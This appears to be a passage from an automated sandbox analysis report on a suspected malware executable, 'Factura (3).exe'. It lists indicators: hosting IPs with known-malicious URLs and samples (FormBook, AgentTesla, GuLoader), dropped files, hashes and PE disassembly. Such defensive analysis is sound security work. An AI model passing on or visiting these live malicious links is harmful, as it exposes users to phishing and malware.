                                                    • 192.185.143.203
                                                    http://goingovertown.org/Blog.php?mc_cid=8253dd19f4&mc_eid=UNIQIDGet hashmaliciousUnknownBrowse
                                                    • 162.241.216.50
                                                    https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%3A%2F%2Flaunch%2F%3futm_content%3dUL_hero%26utm_source%3dsf%26utm_medium%3dcrm%26utm_campaign%3dnl%26utm_term%3dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%26mktportal%3dNL&af_web_dp=https://pcc.zemmz.com/closer/8070/new/new/dvader@hinckleyallen.com##Get hashmaliciousUnknownBrowse
                                                    • 162.241.192.189
                                                    Maersk Arrival Notice ready for Bill of Lading 238591458-393747337-837473734-283473743.exeGet hashmaliciousFormBookBrowse
                                                    • 162.214.77.4
                                                    Quotation_#432768#_pdf.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 108.179.234.136
                                                    AWB#150322.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 50.87.253.239
                                                    ONECOMDKvm6XYZzWOd.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                    • 77.111.240.163
                                                    rCheq0004783.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 46.30.211.38
                                                    Chq book 004237.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 46.30.211.38
                                                    o8JSCMaz7d.exeGet hashmaliciousFormBookBrowse
                                                    • 46.30.213.191
                                                    https://www.snookerandpoolservices.co.uk/wp-admin/user/dd.phpGet hashmaliciousUnknownBrowse
                                                    • 46.30.213.169
                                                    rQuotationRequestandProductAvailabilityForm.exeGet hashmaliciousFormBookBrowse
                                                    • 104.37.39.71
                                                    Forligsmnd.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 46.30.211.38
                                                    Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                    • 46.30.213.191
                                                    150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                    • 46.30.213.191
                                                    SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                    • 46.30.213.191

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_ffe1da0279efac7f4e4b345ee23c42a8f6b5b2d_e3b0f337_eea0d557-494a-4ceb-8911-97ffcb0b36bc\Report.wer

                                                    Download File
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):1.5474212186830443
                                                    Encrypted:false
                                                    SSDEEP:192:+jS0zmGPpn0AcannjaVTyoo85WlXxUJlzuiF5Z24lO8n:30CGPKATnnj+TH5gXxULzuiF5Y4lO8n
                                                    MD5:08DC534C411AD21E504431B89C290386
                                                    SHA1:7F06C1E91160574A744B87CC48F6FE42B6AAD0D9
                                                    SHA-256:F63C2FAA0DC6D4E1D91F6C5D3A56CC21CBF0F3DE63536D5A1D573585372DDE73
                                                    SHA-512:FE0956891B9FAEBF5D306BC49D8FF5C71946541AEFFDE83EB335FA67CD59E62C2700B632B3DC4894FD59E92BCC33D404EC9D17E25A4D166B76483E37BFC1C8BD
                                                    Malicious:false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.3.4.6.2.9.8.8.9.7.9.5.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.3.4.6.3.0.2.3.3.5.4.5.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.a.0.d.5.5.7.-.4.9.4.a.-.4.c.e.b.-.8.9.1.1.-.9.7.f.f.c.b.0.b.3.6.b.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.8.4.2.f.b.b.-.6.6.9.e.-.4.0.2.2.-.a.f.5.7.-.3.4.7.3.9.4.4.9.2.7.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.4.4.-.0.0.0.1.-.0.0.1.4.-.a.f.8.1.-.6.9.3.f.a.4.a.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8AA.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8634
                                                    Entropy (8bit):3.7060386100256015
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJ4q16YWpRgmfZaw9wIprw89bptUfACjm:R6lXJ116Y4RgmfQwS4pef4
                                                    MD5:E5641796997B8E3691CC1357FC74ABAA
                                                    SHA1:AB212BBFB601338B3123CE83976030404FF655A7
                                                    SHA-256:48BE0EF6C6F1F08593938EBE40DAD6D372B9D9BD323649DC5C216A9E38594ECB
                                                    SHA-512:A516EC52246F8E5E7BE461BA349F65F1493FC3E88C6A8148703744BE3325AC0073CBC6B55720C40539770192CBDA276861A5EA9D675724C8690B8090C218715C
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.9.2.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DA.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4831
                                                    Entropy (8bit):4.500052590875375
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsvJg771I92BWpW8VYvYm8M4JQ9ExFgfyq8vlEPytfDd:uIjfRI7xQ7VjJQW0fW+PufDd
                                                    MD5:1F5AD32E818E6C07F6DFE331AA3892F9
                                                    SHA1:B5CB35F8411D98EA2AA1C4C1BB321D1E989436CC
                                                    SHA-256:3510BD5B59BAF105BEE3171D6D1CD7B5B9CB97DD90E1B1EFFF03B01D20FAC069
                                                    SHA-512:497D460A92EEE778614B01342F26B1CC709C0019E6CB327DB3DAA876FF0A3F5FF9B8CF20A1C08717B47C52C8A01BAF05783DCFA516375F6E391578CE486979A9
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="325821" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERFCB2.tmp.dmp

                                                    Download File
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Thu May 16 15:18:21 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):825760
                                                    Entropy (8bit):3.3715716821356314
                                                    Encrypted:false
                                                    SSDEEP:6144:fD3W6xrL+iAHqcD0SPa3Q802hrz9P1QqeJFh9TBQ+NcWc:fzWgmi4qa0SyQ8BhrzpWzJxTK+N1
                                                    MD5:C8E8A1893EBD1C61DBD483A05D79EADD
                                                    SHA1:3D9BAC22D11EC378707D8EBDC39F7E6513751FBF
                                                    SHA-256:4A3BEF2C97C905E63DD2794BD5E69F8EBE259D5D51CBC1422EFD27D7332F17D2
                                                    SHA-512:1B803C393799838118302336C7365CDC9D8DA52B9C167F73B5F5ABB1E457DA1FA37F0588B7009CA5C49F5CB838D2D4BCEBF3ABD1B6412BDB8F318B856E43C3CA
                                                    Malicious:false
                                                    Preview:MDMP..a..... ........#Ff........................\)...........)..d4.....................`.......8...........T............c...6..........H^..........4`..............................................................................eJ.......`......Lw......................T.......D....#Ff.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.0818136700495735
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllulrlgll//Z:NllUml
                                                    MD5:BCE202BE96167104C292ABBA72DDA325
                                                    SHA1:2F7A5938BD57E9769440EDF0B6700DD001DF7AC6
                                                    SHA-256:680BC38EEF1B5175C4E728CEA436662498DC7F8E5570CBA66D7F9627AC0A0AEE
                                                    SHA-512:195CAC106561793B62A216DA442AA663BDEDCDFCA2920848583880B25489E03888AF732B6F07834DB3A4E892F24020CC8E2C37D54F1B61F20BEEFCCDB38F0189
                                                    Malicious:false
                                                    Preview:@...e................................................@..........

                                                    C:\Users\user\AppData\Local\Temp\2E85-1J297

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\chkdsk.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1221538113908904
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                    MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                    SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                    SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                    SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3y5t5afe.t31.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcqinub3.fca.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n552dnwt.jhp.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqnvmwe4.tut.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rh4k1zuz.fj5.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zz3a51ni.ow5.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\file-22993.putik

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Factura (3).exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):21008
                                                    Entropy (8bit):7.991553194087344
                                                    Encrypted:true
                                                    SSDEEP:384:O8bV5GYbvtlFXu7HN159ELb0t6Es95HTqJLpdQ+lzK1cF3z81FBYlr:bbGq1lYN159E/DAJd/42Fdr
                                                    MD5:E39D3EA68036A023080210317A6674A7
                                                    SHA1:77CD37A9D2F87699C64B305AD1399C360FA71C58
                                                    SHA-256:D14365650DA0D9D96A3AEF7C07D7B191AA987615ED67EAB3F6C55BAC7D79FCAA
                                                    SHA-512:D4766E9C79CE413B2FA93D3EB2B9F3F806A5DB706B8959F420A9A7B0FC6AB1ED6634916EC3C0C2421DD504BD2152490A1273CEA80D586F516A9A08D79315384B
                                                    Malicious:false
                                                    Preview:*9b.]i.HRe.i........mO..I.l..if............c....|....c".....rz6.s.*....0../E".^..B.q....`.8)..\.9q.....*wQ.4qy..R.....eg.....D.;..A..gV7/.=c.j.tw..*Qv..P~.C.}%.d...@.L..j.*x...}3..#9I.R0.0N?..]...u...4.4...9(...C_..X.....n...v...(?.;.3~d'..J...j.?.../\.."L>K.>...xi.t..........G.B&.\.C.4:yvG....^.@..4.|bG.v.yv.F.P=.4.....S...O...o.+..x..f.....c..k..>.....q..z.....`..../.B...'.........s._..)...._. *:.Yi6.kP.Zy.)....0.W.#..]d.,'.$p...,a...p4......'.w/*......B..-.A.J.{.r.S...O.......p.35........].........S..|.9.+9.V...~c.MHw..y".R.FvwG:..I....yc..F..}b.'.Yl5.i....M.$'.d..(......!.............p...$.^.6..L.e...,f.%..~].o.K.^..@O}....ts.22......#.._..lrssl....5*"......Y.....Mn=:L.~...#.v.:.n....I..[7Q.~......c+.!...!K7..k.*.q.5.-......`Ob.6._.Ux.2.'>yk.^..IS.".T..$.f..3x...\....B6E..(K..&h.4x.....O...K].c..D... ..n..~..6.#.t.....mi...8B2..D...RF.VS.....8.d)y|X..b....w.7...4R..v.W[.AlI..^.b..t.G..=.R...k3.o........s4L......R...F.p.F....e...

                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                    Download File
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.394804600876613
                                                    Encrypted:false
                                                    SSDEEP:6144:6l4fiJoH0ncNXiUjt10qCG/gaocYGBoaUMMhA2NX4WABlBuNAbOBSqa:q4vFCMYQUMM6VFYSbU
                                                    MD5:E4CD9858665E449E1D3F58639AB7A117
                                                    SHA1:CECC02C723D89F6E8811D41B1DF24472C2E8D3A0
                                                    SHA-256:D66F4C2A006BBC8385D4DA097D7A9BC4733DA7C4D5A522ED6846A46D939F845D
                                                    SHA-512:10E0EB57FDF06A5623BD11097DD7D5D5440A86CCF691C0F26641C0E3008532B7573A57029290B12EFB31AE68417AFD8DAB95DD80C3A58F32740CA1F4943966DC
                                                    Malicious:false
                                                    Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...H.................................................................................................................................................................................................................................................................................................................................................F.|........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    \Device\ConDrv

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with very long lines (696), with CRLF, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):8552
                                                    Entropy (8bit):5.34468812107699
                                                    Encrypted:false
                                                    SSDEEP:96:OMxSVrwxSVCxSYxSuBI0jzlVlVlVA5xSOGRRRCuVUC72mA:OLr/aDDDA1GRRRCuVUC72mA
                                                    MD5:4BCC2E6BA6CEED46BFBE863E223ECC28
                                                    SHA1:4F0BD3943A5B51F0BF452248A53D38F79DA11BBC
                                                    SHA-256:96DABE0B10B682FB76C274B3BD0A40FB0B9B6B8FF702A392C4751F55E32FF039
                                                    SHA-512:BC7763DA47A5B772B5D0F4B9F8016FC0156FCA8E16EE682B9F97B7BBA94F395DC35D5C3533DF4AF0270089D0FB499553D68B9A6519C356A4FE4C995CD01970C3
                                                    Malicious:false
                                                    Preview:.Unhandled Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt... at _SA._RB(String , String , IntPtr , IntPtr , Boolean , UInt32 , IntPtr , String , IntPtr , IntPtr ).. --- End of inner exception stack trace ---.. at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor).. at System.Reflection.Runtim

                                                    Static File Info

                                                    General

                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                    Entropy (8bit):7.404079699333802
                                                    TrID:
                                                    • Win64 Executable Console (202006/5) 92.65%
                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                    • DOS Executable Generic (2002/1) 0.92%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Factura (3).exe
                                                    File size:1'034'668 bytes
                                                    MD5:367f6a9b9b00f860281fe3865a0d33f0
                                                    SHA1:b82f862d256fd63ceb31982178b35f31670a13d3
                                                    SHA256:0b5726f67e41a222543e4bc949db567350231b5dd0c791d72ce2005e0a5af704
                                                    SHA512:d707ad47a974e55f8f7cc91969af01c22aa6ab758c41320b9f93398e3ff1cb5b26e64e74ed979c1b2939e1ce252278e18186a9b6e60ebc54634d58f07a2fc392
                                                    SSDEEP:12288:42hb+TTZEcmgH5KqlyUNbG1pxUz5i9SkO0a5t35kZUh1EEREmbm/8b+miXnsJ9nI:4ab+hHQqqwzI9yJkZA4ECmmsJpaWA
                                                    TLSH:E025E041B7AC54F4D4B7D1388982650AFBA17C568360DBDB67A04A5B1F236E0BD3EF80
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cz..'.h.'.h.'.h.lck.!.h.lcm...h.lcl.7.h.'.h.&.h.lci.$.h.'.i.D.h.!.l.7.h.!.k.5.h.!.m.u.h.I.m.&.h.I.j.&.h.Rich'.h................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x140017cec
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows cui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x6644A30B [Wed May 15 11:56:59 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:daf5c93667eaae2edfeefaa93a963f14

                                                    Entrypoint Preview

                                                    Instruction
                                                    dec eax
                                                    sub esp, 28h
                                                    call 00007F580C7D2B94h
                                                    dec eax
                                                    add esp, 28h
                                                    jmp 00007F580C7D2357h
                                                    int3
                                                    int3
                                                    retn 0000h
                                                    int3
                                                    dec eax
                                                    mov dword ptr [esp+10h], ebx
                                                    dec eax
                                                    mov dword ptr [esp+18h], esi
                                                    push edi
                                                    dec eax
                                                    sub esp, 10h
                                                    xor eax, eax
                                                    xor ecx, ecx
                                                    cpuid
                                                    inc esp
                                                    mov eax, ecx
                                                    inc ebp
                                                    xor ebx, ebx
                                                    inc esp
                                                    mov edx, edx
                                                    inc ecx
                                                    xor eax, 6C65746Eh
                                                    inc ecx
                                                    xor edx, 49656E69h
                                                    inc esp
                                                    mov ecx, ebx
                                                    mov esi, eax
                                                    xor ecx, ecx
                                                    inc ecx
                                                    lea eax, dword ptr [ebx+01h]
                                                    inc ebp
                                                    or edx, eax
                                                    cpuid
                                                    inc ecx
                                                    xor ecx, 756E6547h
                                                    mov dword ptr [esp], eax
                                                    inc ebp
                                                    or edx, ecx
                                                    mov dword ptr [esp+04h], ebx
                                                    mov edi, ecx
                                                    mov dword ptr [esp+08h], ecx
                                                    mov dword ptr [esp+0Ch], edx
                                                    jne 00007F580C7D253Dh
                                                    dec eax
                                                    or dword ptr [00049BBBh], FFFFFFFFh
                                                    and eax, 0FFF3FF0h
                                                    dec eax
                                                    mov dword ptr [00049BA3h], 00008000h
                                                    cmp eax, 000106C0h
                                                    je 00007F580C7D250Ah
                                                    cmp eax, 00020660h
                                                    je 00007F580C7D2503h
                                                    cmp eax, 00020670h
                                                    je 00007F580C7D24FCh
                                                    add eax, FFFCF9B0h
                                                    cmp eax, 20h
                                                    jnbe 00007F580C7D2506h
                                                    dec eax
                                                    mov ecx, 00010001h
                                                    add dword ptr [eax], eax
                                                    add byte ptr [eax], al
                                                    dec eax
                                                    bt ecx, eax
                                                    jnc 00007F580C7D24F6h
                                                    inc esp
                                                    mov eax, dword ptr [0004B31Dh]
                                                    inc ecx
                                                    or eax, 01h
                                                    inc esp
                                                    mov dword ptr [0000B312h], eax

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4bb140x28.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x650000x31f8.pdata
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x6a0000x9f0.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x475800x1c.rdata
